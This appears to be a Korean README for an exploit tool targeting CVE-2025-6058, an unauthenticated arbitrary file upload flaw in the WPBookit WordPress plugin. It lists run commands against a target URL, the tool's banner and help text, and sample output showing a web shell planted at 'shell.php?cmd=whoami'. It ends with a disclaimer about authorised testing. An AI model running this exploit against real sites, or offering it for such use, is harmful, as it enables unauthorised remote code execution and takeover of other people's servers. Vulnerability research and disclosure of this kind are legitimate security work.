
WPBookit <= 1.0.4 - 인증되지 않은 임의 파일 업로드
WordPress용 WPBookit 플러그인은 1.0.4를 포함한 모든 버전에서 add_booking_type 경로에 연결되는 image_upload_handle() 함수의 파일 형식 검증 누락으로 인해 임의 파일 업로드에 취약합니다.
이 결함으로 인해 인증되지 않은 공격자가 영향을 받는 사이트의 서버에 임의의 파일을 업로드할 수 있으며, 잠재적으로 원격 코드 실행으로 이어질 수 있습니다.
| CVE | CVSS 점수 | 공개일 | 최종 업데이트 |
|---|---|---|---|
| CVE-2025-6058 | 9.8 (치명적) | 2025년 7월 11일 | 2025년 7월 12일 |
이 익스플로잇은 다음 과정을 자동화합니다:
python3 CVE-2025-6058.py -u http://target.com/wordpress
python3 CVE-2025-6058.py -u http://target.com/wordpress
python CVE-2025-6058.py -help
______ __ __ ________ ______ ______ ______ _______ ______ ______ _______ ______
/ \ / | / |/ | / \ / \ / \ / | / \ / \ / | / \
/$$$$$$ |$$ | $$ |$$$$$$$$/ /$$$$$$ |/$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |
$$ | $$/ $$ | $$ |$$ |__ ______$$____$$ |$$$ \$$ |$$____$$ |$$ |____ ______ $$ \__$$/ $$$ \$$ |$$ |____ $$ \__$$ |
$$ | $$ \ /$$/ $$ |/ |/ $$/ $$$$ $$ | / $$/ $$ \ / |$$ \ $$$$ $$ |$$ \ $$ $$<
$$ | __ $$ /$$/ $$$$$/ $$$$$$//$$$$$$/ $$ $$ $$ |/$$$$$$/ $$$$$$$ |$$$$$$/ $$$$$$$ |$$ $$ $$ |$$$$$$$ | $$$$$$ |
$$ \__/ | $$ $$/ $$ |_____ $$ |_____ $$ \$$$$ |$$ |_____ / \__$$ | $$ \__$$ |$$ \$$$$ |/ \__$$ |$$ \__$$ |
$$ $$/ $$$/ $$ | $$ |$$ $$$/ $$ |$$ $$/ $$ $$/ $$ $$$/ $$ $$/ $$ $$/
$$$$$$/ $/ $$$$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited
usage: CVE-2025-6058.py [-h] -u URL
CVE-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target URL e.g http(s)://target.com/wordpress
[*] Checking plugin version ...
[*] Exploiting file upload ...
[+] Exploitation successful!
[+] Shell path: wp-content/uploads/2025/07/shell.php?cmd=whoami
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited
이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.
저자는 어떠한 오용 또는 승인되지 않은 활동에 대해서도 책임을 지지 않습니다.
사용에 따른 책임은 본인에게 있으며, 항상 대상 시스템을 테스트할 권한이 있는지 확인하십시오.
제작자: Khaled Alenazi (Nxploited)